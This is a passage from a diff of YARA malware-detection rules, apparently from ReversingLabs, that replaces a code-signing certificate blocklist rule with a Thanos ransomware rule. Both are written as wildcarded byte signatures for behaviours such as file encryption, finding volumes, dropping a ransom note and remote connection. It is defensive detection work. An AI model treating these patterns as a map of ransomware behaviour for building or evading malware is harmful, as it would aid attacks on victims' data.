48 81 FA ?? ?? + ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85 + ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? + 66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D + 4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B + 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? + ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85 + ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? + 66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D + 4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B + 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? + ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 + } + $encrypt_files_v1 = { + 41 83 CC ?? 44 89 64 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FF ?? 48 0F 43 8C 24 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 8B F8 41 83 E4 ?? 44 89 64 24 ?? 48 8B 94 24 ?? ?? ?? ?? 48 + 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? + ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 49 + ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? + ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 9C 24 ?? ?? 00 00 40 F6 C7 ?? 74 + ?? 49 8B CF E8 ?? ?? ?? ?? 90 48 BE ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 4C + 8D 35 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? C6 84 + 24 ?? ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B F0 48 + 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 4C 8B 70 ?? 48 + 83 78 ?? ?? 72 ?? 48 8B 30 48 8D 8C 24 ?? ?? ?? ?? 49 83 FE ?? 73 ?? 41 B8 ?? ?? ?? + ?? 48 8B D6 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? + ?? EB ?? 4C 89 AC 24 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 89 BC 24 ?? ?? ?? ?? 49 3B + FD 49 0F 47 FD 48 8D 57 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4E 8D 04 75 ?? ?? + ?? ?? 48 8B D6 48 8B C8 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 + } + $find_system_volumes_v2 = { + BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 0F 1F 44 00 ?? 4C 8D 8D ?? + ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 89 74 24 ?? 48 89 74 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? + 48 89 74 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 4C 8D 04 00 48 8D 85 ?? ?? ?? ?? 49 03 C0 48 89 74 24 ?? 48 89 74 + 24 ?? 48 89 74 24 ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 48 8D + 8D ?? ?? ?? ?? 48 3B C8 74 ?? 49 D1 F8 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? + ?? ?? 90 48 8B 43 ?? 48 3B 43 ?? 74 ?? 48 89 30 48 89 70 ?? 48 89 70 ?? 41 B8 ?? ?? + ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? + ?? 66 89 74 24 ?? 48 83 43 ?? ?? EB ?? 4C 8D 44 24 ?? 48 8B D0 48 8B CB E8 ?? ?? ?? + ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B + C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 + ?? 77 ?? E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 41 + B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 + 8B CF FF 15 ?? ?? ?? ?? 48 8B C3 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E + 5D C3 + } + $drop_ransom_note = { + 48 83 3D ?? ?? ?? ?? ?? 48 0F 43 15 ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 4D ?? E8 + ?? ?? ?? ?? 48 8B D8 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 45 8D 46 ?? 48 8B D0 48 8D + 4D ?? E8 ?? ?? ?? ?? 4C 89 73 ?? 48 C7 43 ?? ?? ?? ?? ?? 66 44 89 33 BE ?? ?? ?? ?? + 89 75 ?? 83 E6 ?? 89 75 ?? 48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 + 8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 + C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ?? + ?? 66 44 89 75 ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 43 4D ?? 4C 89 74 24 ?? C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 48 8B D8 48 83 F8 ?? 74 ?? 4C 89 74 24 ?? 45 33 C9 41 B8 ?? ?? ?? ?? 48 8D 15 + ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ?? + 48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA + ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 75 ?? 48 8B 57 + ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 0F 48 81 FA ?? ?? ?? ?? 72 ?? 48 + 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ?? + 4C 89 77 ?? 48 C7 47 ?? ?? ?? ?? ?? 66 44 89 37 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? + 49 8B 73 ?? 49 8B 7B + } + $encrypt_files_v2_p1 = { + BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 48 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 + 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 49 8B FA 49 8B D1 4D 85 D2 + 74 ?? 4C 8B C1 4D 2B C1 0F B7 02 66 41 39 04 10 75 ?? 48 83 C2 ?? 48 83 EF ?? 75 ?? + 49 2B CB 48 D1 F9 E9 ?? ?? ?? ?? 48 83 C1 ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 + 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? + 48 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ?? + ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 0B 00 F3 0F 7F 45 ?? + 48 89 75 ?? 48 89 75 ?? 48 8D 45 ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? + C6 45 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 + ?? ?? 48 8D 45 ?? 83 E0 ?? 48 8D 44 05 ?? 48 89 45 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ?? + 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? + ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 + 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 + 8D 05 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 + C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C + 8B E8 48 89 44 24 ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 + } + $encrypt_files_v2_p2 = { + 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8D 0D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8B CF 41 B8 ?? ?? ?? ?? 49 8B D5 + 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D5 48 8B 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 83 C1 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 E8 ?? ?? ?? ?? + BF ?? ?? ?? ?? 4C 3B FF 0F 8D ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8B FE 49 8B C7 + 48 2B C7 48 99 83 E2 ?? 48 03 C2 48 C1 F8 ?? 4C 8B F0 F2 0F 59 35 ?? ?? ?? ?? 0F 57 + C0 F2 48 0F 2A C0 F2 0F 59 F0 F2 48 0F 2C CE 48 85 C9 0F 85 ?? ?? ?? ?? 4D 85 FF 0F + 8E ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? + 90 48 8D 35 ?? ?? ?? ?? 48 89 75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ?? + ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 + ?? 4D 8B CF 45 33 C0 48 8B D3 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 + 81 FF ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 + ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 + 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? + 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8B CF 45 33 C0 48 8B D3 49 8B CE + E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 99 48 F7 F9 4C 8B E8 48 85 C0 75 ?? 48 8D 45 ?? 48 + } + $encrypt_files_v2_p3 = { + 89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 35 ?? ?? ?? ?? 48 89 + 75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? + ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4D 8B CF 45 33 C0 48 8B D3 + 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? E9 ?? ?? ?? ?? 4D 85 F6 0F 8E ?? + ?? ?? ?? 4D 8B FD 49 C1 E7 ?? 4C 8B A5 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 44 24 ?? 48 + 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 + ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 + 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8B C7 48 8B D3 49 8B + CC E8 ?? ?? ?? ?? 49 03 F5 49 03 FF 49 3B F6 7C ?? 4C 8B A5 ?? ?? ?? ?? 4C 8B 6C 24 + ?? 48 8D 35 ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 4C 8B C3 48 8B 95 + ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 4D 8B C4 + 48 8D 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48 + 85 D2 74 ?? 48 8B FA 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B CA E8 ?? ?? ?? ?? 90 4D 85 ED + 74 ?? 49 8B FD 33 C0 B9 ?? ?? ?? ?? F3 AA 49 8B CD E8 ?? ?? ?? ?? 90 48 89 74 24 ?? + 4C 89 74 24 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x94\\x90\\xE5\\xB1\\xB1\\xE4\\xB8\\x87\\xE4\\xB8\\x9C\\xE6\\xB6\\xA6\\xE6\\x92\\xAD\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" or pe.signatures[i].serial=="f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18") and 1292889599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ((($find_files) and ( all of ($find_system_volumes_v1_p*)) and ( all of ($set_default_icon_p*)) and ($cmd_prompt) and ($exclude_from_encryption) and ($encrypt_files_v1)) or (($find_files) and ($cmd_prompt) and ($find_system_volumes_v2) and ($drop_ransom_note) and ( all of ($encrypt_files_v2_p*)))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Cc8D902Da36587C9B2113Cd76C3C3F8D : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Thanos : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Thanos ransomware." author = "ReversingLabs" - id = "f9e542aa-eaa5-50a5-95dc-fb55f8575c89" - date = "2023-11-08" - modified = "2023-11-08" + id = "e607255d-45a6-573d-956e-f6faa2aa7e9f" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2750-L2768" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "25e524d23ccc1c06f602a086369ffd44b8c97b76c29f068764081339556b3465" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Thanos.yara#L1-L106" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f6bc0c2188a04d2fb2a82a6b6d6cdf7763c32047bec725fe07f01415edf0b4cd" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Thanos" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD + ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ?? + 28 ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 + 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 + 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11 + ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 + ?? 6F ?? ?? ?? ?? 00 DC 00 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 + ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0D 00 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D + ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? + ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F + } + $find_files_p2 = { + 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? 38 ?? ?? ?? ?? 00 00 09 72 ?? ?? ?? + ?? 17 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0C 00 00 + 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? + ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? + 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ?? + ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A + } + $find_files_p3 = { + 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? + ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F + ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? + ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD ?? ?? ?? ?? 08 6F ?? ?? + ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 23 ?? ?? + ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? + ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? + ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? + 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC + 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? + ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 00 DE ?? + 26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 06 13 ?? 2B ?? 11 ?? 2A + } + $encrypt_files = { + 73 ?? ?? ?? ?? 13 ?? 11 ?? 03 7D ?? ?? ?? ?? 11 ?? 04 7D ?? ?? ?? ?? 11 ?? 05 7D ?? ?? + ?? ?? 11 ?? 0E ?? 7D ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? + 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 28 + ?? ?? ?? ?? 0A 06 8E 69 16 FE 02 16 FE 01 13 ?? 11 ?? 2D ?? 00 16 0B 2B ?? 00 06 07 9A + 6F ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? + 00 00 00 00 07 17 58 0B 07 06 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 2B ?? 00 16 0B 2B ?? + 00 7E ?? ?? ?? ?? 02 07 9A 6F ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 02 07 9A + 6F ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 02 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? + ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ?? + ?? 26 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 14 0D 73 ?? ?? ?? ?? 13 + ?? 11 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 00 7E ?? ?? ?? + ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 09 2D ?? 11 ?? FE 06 ?? + ?? ?? ?? 73 ?? ?? ?? ?? 0D 2B ?? 09 73 ?? ?? ?? ?? 0C 08 1A 6F ?? ?? ?? ?? 00 08 16 6F + ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 2B ?? 00 11 ?? 7B ?? ?? ?? + ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? + 28 ?? ?? ?? ?? 00 00 00 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE + 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 00 2A + } + $remote_connection = { + 00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 19 6F ?? ?? ?? ?? + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 02 28 ?? ?? ?? ?? 06 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 0C DE ?? 26 00 00 DE ?? 00 7E ?? + ?? ?? ?? 0C 2B 